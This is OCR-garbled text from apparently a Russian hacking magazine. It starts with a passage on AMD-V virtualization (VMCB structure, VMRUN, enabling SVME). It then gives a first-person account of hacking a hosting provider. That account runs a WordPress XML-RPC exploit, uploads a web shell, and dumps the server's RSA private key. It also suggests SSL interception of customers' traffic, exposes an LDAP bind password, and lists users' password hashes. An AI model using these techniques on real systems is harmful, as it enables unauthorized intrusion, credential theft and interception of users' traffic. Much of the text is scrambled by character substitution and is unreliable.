// второе слово — перехват записи 
сгО-15 

и32 сг_іпбегсербз ; /* оіізеб 

0x00 */ 

// первое слово — перехват чтения 
бгО-15 

// второе слово — перехват записи 





шпі 





НѴРЕР5І6НТ КООТКІТ ОЕТЕСТОК 
ВДЕЙСТВИИ 



аго-15 

и32 бг_іпбегсербз ; /* оіізеб 

0x04 */ 

// поле установки перехваты- 
ваемых исключений (векторы 0-31 в 
ЮТ) 

и32 ехсербіоп_іпбегсербз ; /* 

оіізеб 0x08 */ 

// ІЫТК, №11, 8МІ .... ЮТК. (запись/ 
чтение) , СБТК. (запись/чтение) , 

ЬБТК ( запись/чтение) 

// ТВ. (запись /чтение ) , инструкции 
ВБТ8С, ВБРМС, РБ8НР , РОРР ... 

и32 депега11_іпбегсербз ; /* 

оіізеб 0х0С */ 

и32 депега12_іпбегсербз ; /* 

оИзеб 0x10 */ 



// физический адрес карты разреше- 
ния ввода-вывода 

и64 іорт_Ьазе_ра; /* 

оббзеб 0x40 */ 

// физический адрес карты разре- 
шения шзг 

и64 шзгрш_Ьазе_ра; /* 

оіізеб 0x48 */ 

// это поле нужно для команды 
гббзс 

и64 Цзс_о11зеб; /* оібзеб 

0x50 */ 

// идентификатор адресного про- 
странства гостя, связано со сбро- 
сом ТЬВ, пока это не нужно 

и32 диезб_азіб; /* оіізеб 0x58 

*/ 

и8 б1Ъ_сопбго1 ; /* оГГзеб 0х5С 

*/ 

и8 гез07 [3 ] ; 

ѵіпбг_б ѵіпбг ; /* оіізеб 0x60 

*/ 

и64 іпбеггирб_з1іаботл; /* оГІзеб 
0x68 */ 

// после #ѴМРХІТ здесь окажется 
код причины выхода 

и64 ехібсобе; /* оіізеб 0x70 */ 



и64 


ехібіпбоі ; 


/* оббзеб 


0x7 8 


и64 


ехібіпбо2 ; 


/* оббзеб 


0x80 



*/ 

еѵепбіпб_б еѵепбіпд ; /* оПзеб 
0хА8 */ 

/ / используется для вложенного 
страничного преобразования (пезбеб 
радіпд) — об этом расскажу в дру- 
гой раз 

и64 1т_сгЗ ; /* оббзеб 0хВ0 */ 

1Ъгсбг1_б 1Ъг_сопбго1; /* 
оГГзеб 0хВ8 */ 

// оставшееся место — 832 байта 
— заполняется нулями — оно заре- 
зервировано для дальнейшего //рас- 
ширения 

и64 гез09[104]; /* оМзеІ 0хС0 

раб До заѵе агеа */ 



Все неиспользуемое пространство обя- 
зательно должно быть заполнено нулями. 
Вторая часть ѴМСВ содержит состояние 
регистров гостя. Из этой области во время 
выполнения инструкции ѴМРІІЫ (о ней 
скажу позже) загружается информация о 
состоянии гостя, а при выходе из гостево- 
го режима она (информация о состоянии) 
сохраняется там же. 



// начало области состояния 
зѵт_зедтепб_гедізбег_б ез; 
оіівеЬ 1024 */ 

зѵт_зедтепб_гедізбег_б сз; 
зѵт_зедтепб_гедізбег_б зз; 
зѵт_зедтепб_гедізбег_б бз; 
зѵт_зедтепб_гедізбег_б бз ; 
зѵт_зедтепб_гедізбег_б дз; 
зѵт_зедтепб_гедізбег_б дббг; 
зѵт_зедтепб_гедізбег_б Іббг; 
зѵт_зедтепб_гедізбег_б іббг; 
зѵт_зедтепб_гедізбег_б бг; 



/* 



и64 ебег; /* оббзеб 

1024 + 0хБ0 */ 
и64 гезІЗ [ 14 ] ; 

и64 сг4 ; /* Іоббзеб 

1024 + 0x148 */ 
и64 сгЗ ; 
и64 сгО; 
и64 бг7 ; 



СТРУКТУРА КАРТЫ РАЗРЕШЕНИЯ МБР (МБРРМ). КАЖДЫЕ 2 БИТА ОТ- 
ВЕЧАЮТ ЗА ОТДЕЛЬНЫЙ МБР 

ТаЫе 15-3. Напдеа оі М8П Регтіз&іопз Мар 



Вуіе ОНееІ 


М5Н Напде 


Сиггет Іізаде 


ОООЬ~7РРП 


оооо„ооооь-оооо_і РРРИ 


Репііит^-сотраіі Ые МЗРз 


Ѳ00Н-РРРК 


сооо_оооои-сооо_і РРРН 


АМО ЗіхіЬ (ЗепегаЙоп хѲ6 Рг&севзог МЗРЕз алб 8Ѵ8САИ 


1000Н-17РРП 


С00 1 _0000П- ОО0 1 _1 Р РРП 


АМО 8ѳѵеп№ апй ЕідІііО бвлетаііоп Ргасѳззог М8Вз 


1&00Н-1 РРРЬ 


хххх_хххх-хххх_хххх 


гееегѵеб 



► 058 



ХАКЕР 01 /133/ 10 



ІШ 






Зарезервировано (должно быть 0) 


ЗѴМОІЗ 


юск 


ОІЗ_А20М 


Р.ІЫІТ 


ОРй 



М5К-РЕГИСТР ѴМ_СК, ПОЗВОЛЯЮЩИЙ ЗАБЛОКИРОВАТЬ УСТАНОВКУ БИТА5ѴМЕ В ЕРЕК 



и64 сігб; 


и64 


гііадз ; 


и64 


гір ; 


и64 


гез14 [11] ; 


и64 


гзр ; 


и64 


гезІБ [3 ] ; 


и64 


гах; 


и64 


зРаг ; 


и64 


ІзРаг ; 


и64 


сзРаг ; 


и64 


зРтазк; 


и64 


кегпдзЬазе; 


и64 


зузепРег_сз ; 


и64 


зузепРег_езр 


и64 


зузепРег_еір 


и64 


сг2 ; 



// регистры, связанные с трасси- 
ровкой ветвлений 
и64 сІеЪидсРІтзг ; 
иб4 ІазРЪгапсМготір; 
иб4 ІазРЪгапсРШоір; 
и64 ІазРіпРРготір; 
иб4 ІазРіпРРоір; 
и64 гезіб [301] ; // далее просто 
2408 нулевых байт 
} 

С ѴМСВ кое-как разобрались. Теперь можно 
переходить к описанию инструкций. 

ѴМ РІб N (опкод команды — ОРИ, 016, 0086) — 
инструкция запуска виртуальной машины. 

Это основная и самая важная команда в 
аппаратной виртуализации. ѴМ РРІ N при- 
нимает в качестве аргумента в регистре гах 
физический адрес управляющего блока вир- 
туальной машины (ѴМСВ), который описывает 
состояние виртуальной машины. ѴМВІІЫ 
доступна только с нулевого кольца (вообще, 
с третьего кольца из инструкций, составляю- 
щих сабжевое расширение архитектуры про- 
цессора, доступна только ѴММСАІ_І_]. 
Гипервизор настраивает структуру ѴМСВ, 
устанавливает в ней перехватываемые 
инструкции, прерывания и т.д. Переход 
в режим гостя происходит посредством 
инструкции ѴМПІЛЧ. Состояние хоста 
сохраняется в области памяти, на кото- 
рую указывает содержимое тзг регистра 
ѴМ_Н5АѴЕ_РА (РА — РГіузісаІ АсМгезз, то есть 
здесь мы опять имеем дело с физическим 
адресом этого региона). В этой области памя- 
ти сохраняется минимальная информация, 
необходимая для возобновления работы 



хоста после выхода из гостя (регистры сз.гір, 
ебег, сгО, сгЗ ...). Теперь, когда виртуальная 
машина успешно запущена, мы вернемся 
в режим хоста только при возникновении 
перехваченного гипервизором события 
(условия #ѴМ ЕХІТ) . После #ѴМ ЕХІТ будет 
выполнена следующая за ѴМВЭИ инструк- 
ция в гипервизоре. Специально для тебя я 
сделал обобщающую схему вышеописанного 
(смотри картинку «Схема работы виртуализа- 
ции АМЭ-Ѵ»), 

Две инструкции ѴМ5АѴЕ (ОРИ, 01 Ь, СЮЕ>Ы и 
ѴМЮАО (ОРГі, 01 И. СЮАЫ дополняют ѴМПІІМ 
и служат для сохранения/загрузки части 
ѴМСВ. 

ѴММСАП (ОРГі , 01 Ь, СЮ9Ы - инструкция, 
позволяющая из гостевого режима перейти 
в хост. Доступна как на нулевом, так и на 
третьем кольце. Правда, я лично не пони- 
маю смысла в этой инструкции. Если она не 
перехватывается, то возникает #1Ю. То есть, 
безусловного вызова гипервизора не проис- 
ходит. Можно было бы, наверное, не вводить 
дополнительную инструкцию, использовать 
туже СРЭЮ (или другую, которую можно 
перехватить). 

ВКЛЮЧЕНИЕ ВОЗМОЖНОСТЕЙ АППА- 
РАТНОЙ ВИРТУАЛИЗАЦИИ Все инструк- 
ции работы с аппаратной виртуализацией (за 
исключением 5КІІЧІТ, там особый случай) тре- 
буют установки бита 5ѴМЕ (он 12-й) в регистре 
ЕЕЕВ (иначе мы получим исключение #1Ю 
— неверная инструкция). Что это за регистр — 
ЕГЕР? Расшифровывается аббревиатура как 
ЕхТепбесІ ЕеаТиге ЕпаЫе РедізТег — 
это тзг, который отвечает за включение 
дополнительных возможностей проца (что 
видно из расшифровки), и он имеет адрес 
0С0000080Г. Приведенный ниже код включа- 
ет возможности аппаратной виртуализации: 

зиЪ гсх,гсх 

тоѵ есх, 0С0000080Г ; адрес ЕЕЕК 

гсітзг ; читаем ЕЕЕК 

ЪРз еах,12 

ѵчгтзг 

Кстати, установка бита 5ѴМЕ может быть 
заблокирована, поэтому после того, как мы 
записали тзг, нужно снова прочитать его 
содержимое и проверить — установился ли 
заветный бит. 

За блокировку инструкций виртуализации 
отвечают тзг-регистры — ѴМ_СР и 5ѴМ_ 



ѴААСВ(4 кб) 




СТРУКТУРА ѴМСВ 

КЕѴ (опционально). Бит ЗѴМБІЗ, который 
четвертый в ѴМ_СР, запрещает установ- 
ку ЕЕЕР.5ѴМЕ, а ШОК (бит три) в том 
же регистре запрещает сброс 5ѴМБІ5 и 
ШОК (получается, что ШОК — это защи- 
та для защиты). ШОК можно сбросить 
либо после перезагрузки, либо указать 
ключ в машинно-зависимом регистре 
5ѴМ_КЕѴ (если этот ключ был установлен 
перед блокированием виртуализации). 
Сама возможность блокировки, к слову, 
появилась в АМБ-Ѵ не сразу, а только со 
второй ревизии (специально для пара- 
ноиков:)). 

ЗАКЛЮЧЕНИЕ Первый теоретический 
рубеж преодолен. Изложение получилось 
несколько сумбурным, но, я думаю, это тебе 
не помешало уловить суть. Осталось реа- 
лизовать полученные знания на практике, 
что мы и сделаем в последующих статьях. 
Если у тебя есть какие-то замечания или 
вопросы — пиши мне на мыло, постараюсь 
ответить, т 
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взлом 



I I ѴЕ N Ѳ 0 , ІѴЕМѲ0ЙМ05ЕСІІРЕ.ІЫР0 НТТР://ѴѴѴѴѴѴ.М05Е 



КАЖДОМУ ПРОФЕССИОНШ ХОЧЕТСЯ СЛАВЫ И ДЕНЕГ В ХАКЕРСКОЙ СРЕДЕ 
И ТО. И ДРУГОЕ СЧИТАЕТСЯ НЕОТВРАТИМЫМ ЗЛОМ: И К ТОМУ. И К ДРУГОМУ 
НАСТОЯЩИЙ ХАКЕР ИСПЫТЫВАЕТ ОТВРАЩЕНИЕ. НО. КАК ГОВОРИТСЯ. 
БОТНЕТ ПРИХОДИТ И УХОДИТ, А КУШАТЬ ХОЧЕТСЯ ВСЕГДА. ТАК ЧТО 
ОДНИМ ИЗ СПОСОБОВ ПРОВЕДЕНИЯ ПЛАТНЫХ НАУЧНЫХ ИССЛЕДОВАНИЙ 
НА СЕГОДНЯШНИЙ ДЕНЬ ЯВЛЯЕТСЯ ОЦЕНКА ТОГО. КАК ПРОСТО МОЖНО 
ПОЛУЧИТЬ ДОСТУП К ОПРЕДЕЛЕННОМУ РЕСУРСУ. ЭТИМ МЫ СЕГОДНЯ 
И ЗАЙМЕМСЯ! 



ПРОВАЙДЕР ВСЕЯ СЕТИ Если ты предста- 
вил, что виртуальные купюры ѴѴМ2 уже шеле- 
стят у тебя в кошельке, и глазки заблестели, то 
пойдем дальше и представим типичную кар- 
тинку — хостинг- провайдера ѵѵѵѵѵѵ.опппіз.сопп . 
у которого, как соты в пчелином улье, хостится 
множество вкусных сайтов с хорошим РЕ (за 
которые отдают неплохие деньги]. Один такой 
попался мне совсем недавно, а остановился 
я на нем совсем случайно — очень уж пове- 
селило его название — Отпіз ІЧекл/огк (что в 
вольном переводе означает «Провайдер Всея 
Сети»]. Особенность данного божественного 
пасквиля в том, что ребята из Отпіз помеша- 
ны на послеполуденных молитвах и безопас- 
ности. Многие очень умные люди обломали 
свои зубки о всевозможные хитрости, приду- 
манные этим хостером. 

ПОМОЛИМСЯ, ДЕТИ МОИ! А заодно поду- 
маем головой — хостят они кого попало, 
одних только простых сайтов больше 5000. 
Наверняка, найдутся пингвины, которые не 



в ладах со своими движками и СМ5. Если 
все так, то и искать можно, начиная с самых 
простых вариантов (потому как настоящий 
хактивист всегда идет в обход]. Выбираем 
несколько вариантов из наиболее доступ- 
ных — ѴѴогсІРгезз, Ооотіа, ОаІіаЕібеЕпдіпе, 
СоѵѵРНР и пр. Теперь пробуем... Нас инте- 
ресуют не просто сайты, а сайты-соседи, 
которые мало того, что хостятся физически 
на одном сервере, так еще и принадлежат 
нашему священному чуду отпіз.сот . 

Чтобы найти сайты-соседи, можно восполь- 
зоваться отличным сервисом гоЫех.сот . 

Это настоящий швейцарский ножик для ком- 
пьютерных сетей. Он мало того, что рисует 
картинки зависимостей 0145, так еще и нака- 
пливает эту информацию после собственных 
поисковых исследований! У него можно спро- 
сить как ІР-адрес, так и наоборот, доменное 
имя, соседа которому хочется найти. 

В ходе нескольких проб был установлен 
первый кандидат на исследовательский 
«пробив». О чудо! Целью оказался ѴѴогсІРгезз 



древней версии 2.2.1 с уязвимостью ХМЕ- 
РРС ( ЬигптапЬесІІат.сот ]. 

Этого динозавра, конечно, можно валить с 
помощью автоматических средств — напри- 
мер, готового РОС-примера от группы 
поізозесиге.сот . Как работает релиз команды 
(нашей тезки], смотри ниже: 

#ЬеатЬох@кагик# . /щэ-хтігрс-2-2- 
зді.рі Ьккр : //ЬигптапЬесПат. сот/ 
сотрііка кгисктеЬаЬу 31 
ТЬе изаде із соггеск 
[*] Тгуіпд Нозк Ьккр:// 
ЬигптапЬесІІат.сот/ . . . 

[+] ТЬе хт1грс-2-2 зегѵег зеетз 
ко Ье отогкіпд 



Ьзегпате ког ісі = 1 із:--> асітіп 
МЬ5 ЬазЬ ког изег: асітіп 

із: 1кЗс53 937к213Ь5Ь2 47Ь2Ь032с10с1 
2030 



► обо 
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ПРАВИМ ФАЙЛЫ РНР В АДМИНКЕ 
ВЗЛОМАННОГО САЙТА ДЛЯ ПОЛУ- 
ЧЕНИЯ ШЕЛЛА (РАБОТАЕМ ПОД 
ѴѴ0Р0РРЕ55) 



ІІзегпате іо г ісі = 2 із:--> 
Ьигптап 

МсІ5 ЬазЬ Іог изег: Ьигптап 

із: Іісі03373 047а3 3 9032 8е3сі63 52 01 

9ЬЬб 



ІІзегпате іог ІЬ = 3 із:--> 
сотріііа 

Мс15 ЬазЬ Іог изег: сотріііа 

із: ІеЬЗ 0742 Зс9 83 ЗІсеЗ 62 3989328Ь 

2с0а 



ТоЬаІ ЫитЬег оі ІІзегз Іоипсі : -->3 



МуздІ із гиппіпд аз: Ьигпт001@ 

тузді . отпіз . сот 

В качестве параметров сплоиту надо пере- 
дать имя зарегистрированного пользователя 
(сотріііа) , пароль к нему (іхисктеЬаЬу) и 
номер существующего поста, в который этот 
замечательный пользователь может запи- 
сывать любую информацию. Выбранный 
ЬигптапЬесИапп.сопп нас не подвел — и реги- 
страция открыта, и посты наполнять можно 
(их даже видно, что вдвойне приятно, хоть и 
редкость в наше время). На самом деле, вме- 
сто того, чтобы тратить драгоценное время на 
поиск и анализ уязвимого узла, всегда суще- 
ствует вариант приобретения чистого хостинга 
у провайдера — все дальнейшее совершенно 
одинаково как для легального пользователя, 
так и для неравнодушного исследователя :). 
Тем более, в большинстве случаев хостинг- 
провайдер предоставляет свои услуги всего 
на одном-двух очень мощных серверах. Так 
что шанс «промахнуться» и приобрести в 
аренду ненужный тебе хостинг очень мал. 



СУИДНАЯ КАПЕЛЛА Первое, что порадо- 
вало, когда был залит шелл — это отсутствие 
включенного 5АРЕ_М(ЮЕ и пустой список 
недопустимых функций. Казалось бы, запу- 
скай что угодно, делай что угодно — все 
разрешено. Как бы ни так — вместо привыч- 
ного ответа «поЬобу» или «ѵѵѵѵѵѵ» на вопрос 
«ѵѵбоаті» был получен вполне вразумитель- 
ный «ЬигптООІ», то есть, имя конкретного 
владельца данного сайта (на который и 
был установлен шелл). Кроме того, права 
на файлы установлены так, что содержимое 
соседних сайтов недоступно вовсе. Для этого 
веб-сервер сконфигурирован таким образом, 
что во время запуска пользовательских про- 



кі *л Нота 
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5? Ме* Огес Ассоипі 

ЕхігНпд и$ег Ассшп* (эі 1ад$1 1 «век од 
ОІЕэЫ&гі Ііааіг Аееоипі 

ОПЛАТА КРЕДИТКАМИ У ПРОВАЙДЕРА 0МШ5.С0М (СТАТИСТИКАЗА 
СУТКИ ПО ОДНОМУХОСТИНГ-ПЛАНУ) 



грамм и СОІ-сценариев происходит импер- 
сонализация (мы уже писали об этом заме- 
чательном процессе в статье «Пошаговая 
имперсонализация» в пт #048). Все это гово- 
рит о том, что за вопросами безопасности 
здесь стараются следить — ну или хотя бы 
подумали о них, когда строили систему. 

отпіз# ипате -а 

Ьіпих с127 . сизЬ . отпіз . сот 2.6.18- 
12 8 . 4 . 1 . е15 #1 ЗМР Тие Аид 4 
20:23:34 ЕВТ 2009 І686 І686 І386 
СЕЮ/ Ьіпих Ьіпих 

Однако, несмотря на предпринятые меры 
безопасности, мы уже оказались внутри и у 
нас есть возможность исполнять системные 
команды. Раз так, проанализируем конфигу- 
рацию нашего божественного хостера. Самое 
интересное для нас будет находиться в кон- 
фигурационном файле веб-сервера. С этим 
все просто — провайдер использует Ыпих 
(с версией ядра 2.6.18), а нам известно, что 
у Юпіх с вигвамом всегда есть общее — нет 
форточек и внутри сидит апач. Следовательно, 
ищем конфигурационные файлы веб-сервера 
Арасбе. Стандартный файл Ыірсі.сопі 1 радует 
нас следующей строчкой: 

Іпсіисіе /сІіз/сІизЬег/ЪЬЬрсі/отпіз . 
сопі 

Перебравшись в него, сразу становится ясно, 
что мы имеем дело с подключенным ЫЕ5- 
сервером с распределением нагрузки на 
жесткие диски (наверняка отдельный ПАЮ- 
массив с поддержкой І5С5І или оптики). А 
также проясняется, где хранится все самое 
интересное: 

<ВігесЬогу /ѵѵеЪгооЬ/ ?/?/*/*> 
ОрЬіопз -Іпсіехез 
ЗутЬіпкзІІОѵтегМаЬсЪ. -МиІЬіѴіеѵѵз 
ЕхесССІ Іпсіисіез 

АІІоѵѵОѵеггісІе Іпсіехез 
Еііеіпіо АиЫіСопІід ЬітіЬ 0рЬіопз= 
Іпсіисіез , ІпсІисіезЫОЕХЕС ,МиІЬіѴіеѵѵз 
, Іпсіехез , ЗутЬіпкзІіОѵтегМаЬск ,КГопе 
Огсіег а11оѵѵ,(іепу 
АІІоѵѵ Ігот аіі 
</ВігесЬогу> 



САНКТУМ-СЕРТИФИКАТУМ Запись «/ 

ѵѵе Ь го оі/ ?/?/*/* » позволяет веб-серверу свя- 
зать доменное имя (сайта, которого у него 
запрашивают) с конкретным путем. Первые 
две буквы имени формируют ветку, где соб- 
ственно и хранятся данные сайта. Например, 
если наш сайт располагается по адресу 
ШрУ/ѵѵѵѵѵѵ.отпіз.сопп . то файлы сайта нахо- 
дятся в каталоге «/ѵѵеЬгооѴо/т/отпізООІ/ 
ѵѵѵѵѵѵ», где отпізООІ — имя пользователя, 
права которого устанавливаются веб-серверу 
при работе с файлами из домашнего катало- 
га. Еще немного вкусного лежит по адресу 
«/сІіз/сІизіег/ЫірсІ/», — там мы находим... 
сертификат с открытым и закрытым ключами 
сервера! Да-да, именно те самые, которые 
используются бедными пользователями для 
проверки, правда ли то, что этот их любимый 
провайдер или нет. 

[ /меЬгооЬ/сі/ ] саЬ /сііз/сіизіег/ 
ЬЬЬрсі/зесиге . отпіз . сот. кеу 

ВЕСІЫ КЗА РКІѴАТЕ КЕУ 

МІІСХАІВААКВддЬсЕНЪЬМЗОЬтШЗ Ма7 зМ 
КѵедѵШ(І 2 32дІсРЩІ\іиЬбтХТШ5Сз е 
ЗеШ ЦѵШХсіі з Ь 2 дМс ЗЕс РкХЬНгХТМІІѴѵѵВу 
С24з ЗрЬХІиеНх14СЩіх5ѴпНІВ20дсід 
ВидІг844К3 6ЬІТТ0д2хЦзЗиѴ:ЬптЦ2д1ЬгІ 
0 2 еУ 1 с сШкЗрНВ 1 В з 5 ЬпТХоО I ВАОАВ 
АоСАЕОККд1Т/дТ1иос19ХуЪсоОКАЪ1к6110 
28ѵхѵитЬкЬСНВдРгЕ4оіотѵѵТУздхНі 
2скТВКкд2ХсіЬЕВ(ІѴоСТсіІ9ѴСВКЬх2Сду2ѵѵ 
Ь+2ЕН/тхмУиеВхдаАи5у+кЕа9+к6ПАЬ) 
оіЬМ4д2зТЬидкЕ82І71пгѴУЬ0тсСАтх22 Ц 
Ъ6сіаВ+М2МѴо0 0С0СВЗІІЕ+ЬХО2 9 9 РдО 
РІоІЗ 8ЬуѴгхВСпНХ7ТНМосЮсх2п8ВкЕз 2 9 
ЬСЬКгЭЗпВиУдуКѴВеЗоВТОШВсі+т ІУ 
7ШВиЗАпАкЕА4 8 зѴ7уВО+дЬЕСОеВРТЬи Цб 
дохк 0 оііНпуТШЬ. 6 1 кхР 0 О а і ѵтуи Ь С 8у 6 
2д6ѵѵЬ2ѵѵѴсЦ54І8Ьдз^еЫ]тѵ7ТН+СІр4Ре9ѵѵ 
ЦВАР2А 6 У РЫ 2 Еѵѵд 5 / 3 сі ЦеСО 9 КУрВ гос 
ЕЕ9іІЬѵѵІ2Ар/ ЬТ/ЬЗпгп94Е2Р0 Ц2УЬзз7ЛА/' 
1ѵѵ6ЫЬи2кі85издд\ѵЫІсІ2с51пЕС0ЕпУ 
хд2ѴРОК21д6ЕТрОНШЕ+хСОШІЫРЬІІ/ 
дЗт№п/р/КпзХКІР/ШдЬгиВВРВосКЬдЗ 
Р5ЕсТр2АЕНзіЕШ4ЬВВІІС0НЗо04Миух+ТѵН 
ОбЕАѵѵгЬсоЦтКБхѵ^+ктЗз ЗіЬЬРІВѴтЪ. 

8ЫВ2 РР7 3 ЦРзпухА8 і71ІНд7 РидКѵѵ/ 
с6СиВШѵОАЗх2аС>= 

ЕЫВ КЗ А РКІѴАТЕ КЕУ 
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Ведь, что интересно, права как раз на эти 

► обі 






взлом 




СВОДНАЯ ТАБЛИЦА«ЧЕРНОЙ» 
БУХГАЛТЕРИИ СВЯТОГО 0МЫІ5- 
ПРОВАЙДЕРА — ЗА ОДИН МЕСЯЦ 




МАЛЫШКА НАМИЛЛИОНДОЛЛА- 
РОВ — РЕБЯТАЗА МЕСЯЦ «ПЕРЕ- 
РАБАТЫВАЮТ» БОЛЬШЕ 1.5 
МИЛЛИОНОВ ЗЕЛЕНЫХ ДЕНЕГ 



файлы позволяют нам их не только прочесть, 
но и изменить. Фантазия сразу подсказыва- 
ет массу забавных вариантов применения 
полученных сертификата и соответствующего 
ему секретного ключа. Самый интересный 
вариант — использование программ ззізігір 
и ззізпііф но только с небольшой доработкой, 
которая вместо ошибочных сертификатов 
выдавала бы пользователям Отпіз вполне 
себе легальный сертификат того же Отпіз, 
да еще и прямо в онлайне позволяла полно- 
стью читать любые зашифрованные данные 
пользователей. Прочитавши статью о взломе 
551 в прошлых номерах, не составит труда 
проделать необходимые изменения в кон- 
фигурации этих программ. Однако вернемся 
к нашим священным барашкам. Объявив 
праздник курбан-байрам, находим в конфи- 
гурации Апача строку со ссылкой на ЮАР- 
авторизацию: 

[ /ѵ^еЬгооС/сі/ ] сак /екс/кккрсі/ 
сопк . (1/тос1_ѵкюзк_1с1ар . сопк 

ЬоасЗМосіиІе ѵЬозк_1с1ар_тос1и1е 
тос!и1ез/тос1_ѵкюзк_1с1ар . зо 

<1 Шосіиіе тосі_ѵкюзк_1с1ар . о 
ѴТюзкЬБАРЕпаЪІесІ оп 
ѴЪовкЬВАРШгІ " Ісіар : //Ісіар . 
отпіз . сот/ои=Ботаіпз , с1с = 1с1ар , с!с=от 
піз , с!с=сот" 

ѴАо з С ЬсІарВ і п<ЩЖ 
" сп=гоок , ои=8ресіа1 
ІІзегз , с!с=отпіз , сіс=сот" 



ѴЪозкЬБАРВіпсІРаззтлгогсІ 

"пз43кбхз " 

УЬозЦЬБАРРаНЬаск сизк. отпіз. 

сот 

</ІкМос1и1е> 

ЮАР - ОН И В АФРИКЕ ЮАР Такой под- 
ход к авторизации пользователей и раздаче 
контента на мега-сервере является крайне 
многообещающим. Во-первых, это означает, 
что админы работают с тачками, на которых 
стоит ѴѴіпбоѵѵз, а сами изредка подключаются 
к мега-серверу (куда мы, собственно, и про- 
никли], для управления и мониторинга дел. 
Во-вторых, великий сидящий воин Апач не 
умеет авторизовываться в ЮАР со сложными 
схемами аутентификации. Это означает, что 
написанный в открытом виде пароль в строч- 
ке "ѴЬозіЮАРВіпбРаззѵѵогб "пзДЗкбхз" — это 
как раз тот пароль, с которым нас пустят в 
контроллер домена! Праздник продолжает- 
ся, когда незамыленный взгляд замечает, 
помимо пароля, еще и строку подключения к 
ветви ЮАР. Вообще говоря, ЮАР — это не 
только сетевой протокол для доступа к службе 
каталогов, который используется в системе 
ѴѴіпбоѵѵз для хранения всего-всего-всего, но 
и система обработки информации, которая 
включает в себя простой протокол, исполь- 
зующий ТСР/ІР и позволяющий производить 
операции аутентификации (Ьіпб), поиска 
(зеагсЫ и сравнения (сотраге), а также опе- 
рации добавления, изменения или удаления 
записей. Контроллер домена (по сути, ЮАР- 
сервер] принимает входящие соединения на 



ИОАНН ПОТРОШИТЕЛЬ... ВОИСТИНУ, 60061-Е — НОВАЯ РЕЛИГИЯ 

Веб Картинки Видео Карты Новости Пе реводчик ОтаіІ ещё т 




порт 389 по протоколу ТСР Запомни! Всякая 
запись (строка подключения] в каталоге 
ЮАР состоит из одного или нескольких 
атрибутов и обладает уникальным именем 
(ЭЫ — от ОізбпдиізЬеб Ыате]. Уникальное 
имя может выглядеть, например, следующим 
образом: «сп=Иван Петров, ои=Сотрудники, 
бс=ехатрІе, бс=сот». Уникальное имя 
состоит из одного или нескольких относи- 
тельных уникальных имен (РЭЫ — от Пеіабѵе 
ОізбпдиізЬеб Ыате], разделенных запятой. 
Относительное уникальное имя имеет вид 
«ИмяАтрибута м = м значение». На одном уровне 
каталога не может существовать двух записей 
с одинаковыми относительными уникальными 
именами. В силу такой структуры уникального 
имени записи в каталоге ЮАР можно легко 
представить в виде дерева. Запись может 
состоять только из тех атрибутов, которые 
определены в описании класса записи (оЬ]ес1; 
сіазз], которые, в свою очередь, объединены 
в схемы (зсбета). В схеме определено, что 
одни атрибуты являются для данного класса 
обязательными, а другие — необязательны- 
ми. Также схема определяет тип и правила 
сравнения атрибутов. Каждый атрибут записи 



ОСТРОВ ПАСХИ — ВСЕ «КАМЕН- 
НЫЕ ОДМИНЫ» РОДОМ ОТСЮДА 



Соодіе ] 0 Пп гірраг 

® Поиск в Интернете Поиск страниц на русском 



Веб ЙВ Показать настройки 



Поиск 






Результаты 1 - 10 ИЗ примерно 1 180 для ]Ыіп гіррег ыоанн (0,27 секунд) 



Иоанн Кіррег 17.3 (Рго для Ыпих фиптл) - В ІЛШ и ІЭпш Форумы ф 

Иоанн Кіррег запнется быстрый взломщик паропай. в настоящее время ... ЦоЬп іИе 
Еіррег 1 7.3 (Рго йзг іЗпих ЬгапсН) Иоанн Йіррег 1 7 3 (Рго для Ыпих филиал) ... 

нм иліх.согп/ ,Я334Э-]оІіп-гірреі-Ф?-3^хоЧіпиХ'Ьгапс>] Мті * Б 

Тор 15 Уііаі Хакинг Программное обеспечение и инструменты I Наск N .„ О 

ЗЫіп іЬе Кіррет і$ а Іазі ра$$шог<1 сгаскег сигшіііу аѵэіІаЫе Ьт талу Иоанн Кіррег 
является быстръ! н взломщик паролей, в настоящее время доступна для ... 

Нэсклтоб. сот/ЬаскЛорТ б-ѵііэЯ. ../т/ - 



► 062 
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ПОЛЬЗОВАТЕЛИ ИЗНУТРИ ЬйАР 



может хранить несколько значений. О тонко- 
стях настройки и работы ЮАР мы писали в 
статье «Контроллер домена на 5АМВА за семь 
шагов» (в 6 номере ц-ц за 2008 год]. Остается 
I лишь вопрос, как получить доступ к серверу 
ЮАР, который по совместительству испол- 
няет роль контроллера домена? Извне нас 
I поджидает межсетевой экран, начиненный 
запрещающими правилами, как казанский 
плов рисом. Но вот внутри бокса консольных 
приложений для работы с ЮАР попросту нет, 
так что свежеустановленный шелл нам не 
поможет. Остается только одно — установить в 
систему все, что нужно, самим. Ничего не ска- 
жешь, наглость города берет, да и программка 
быстро нашлась подходящая — рЬрЮАР- 
абтіп (скачать можно по адресу рЬрШа- 
расітіп.зоигсеіюгде.пеі: ]. Средство 
рЬрЮАРабтіп написано целиком на РНР, 
работает без необходимости установки каких- 
либо библиотек и патчей, что идеально под- 
ходит для установки на добытом шелле. 
Устанавливаем с помощью шелла 
рЬрЮАРабтіп на ранее исследованный 
вдоль и поперек нами хост. Вписываем 
адрес контроллера и строку подклю- 
чения с паролем в конфигурационный 
файл, запускаем, наслаждаемся досту- 
пом, который позволяет нам подсчитать 
количество настоящих пользователей (их 
в системе 27 ], а также посмотреть их пароли 
в формате І\ІТІ_М! Дельный совет — чтобы 
получить доступ ко всей информации, необ- 
ходимо, во-первых, воспользоваться 
усечением строки доступа до корневого 
домена (то есть, чтобы строка выгля- 
дела как «бс=отпІ5,сІс=сопп» вместо 
«сп = гоо1:,ои=5ресіаІ ІІ5ег5,сІс= 
отпІ5,сІс=сот»], а во-вторых, использовать 
не простой поиск, а экспорт данных из ЮАР 
в файл просто формата — например, С5Ѵ. 



Ьгасі: 100 0 : 986ВВ475ЕБ95731486235А2 
ЗЗЗЕ4Б2 : 68227АСС65С876АБ0БІА627СЗ 
2А06ВБ7 

Іготт: 10 01 : 0ВАБ9021С73А4417306Б27 
2А944ІВВ : 2ВАВ344В45В352СВВ399Б345 
Е8В9В308 

дсЬоп: 1003 : ВЕІ1А10Б73ААЗ 1ААБЗВ435 
В51404ЕЕ : 4АВ4ЕЕЕ0ЕБА7В2Б5А7А57503 
В0С16В65 

Зоеі : 1004 : 505СС6БЕ3797А3352502Е32 
А407 е23:1АЕ71А4А01Е80В0 0СС1Е06Б60А 
53АА7Е 

гооБ : 1005 : ЕЕІБЗАВС1797В8СБЕ68АА2 б 




КЛЮЧИКИ, ПАРОЛИКИ, СЕКРЕТИКИ... 



